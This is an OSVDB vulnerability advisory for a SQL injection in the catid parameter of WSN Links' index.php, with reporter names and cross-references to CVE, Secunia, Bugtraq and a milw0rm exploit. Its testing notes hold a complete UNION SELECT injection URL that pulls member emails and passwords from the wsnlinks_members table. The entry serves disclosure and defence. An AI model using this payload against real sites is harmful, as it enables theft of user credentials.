WSN Links index.php catid Variable SQL Injection

2007-07-21T00:00:00
ID OSVDB:36270
Type osvdb
Reporter xprog(), t0pP8uZz()
Modified 2007-07-21T00:00:00

Description

Manual Testing Notes

http://[target]/Script_Dir/index.php?action=displaycat&catid=1//and//1=2//UNION//ALL//SELECT//1,2,3,4,5,6,7,8,9,10,11,concat(email,0x3a,password),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35//FROM//wsnlinks_members//LIMIT//0,1/*

References:

Secunia Advisory ID: 26246
Other Advisory URL: http://milw0rm.com/exploits/4209
ISS X-Force ID: 35543
FrSIRT Advisory: ADV-2007-2615
CVE-2007-3981
Bugtraq ID: 24996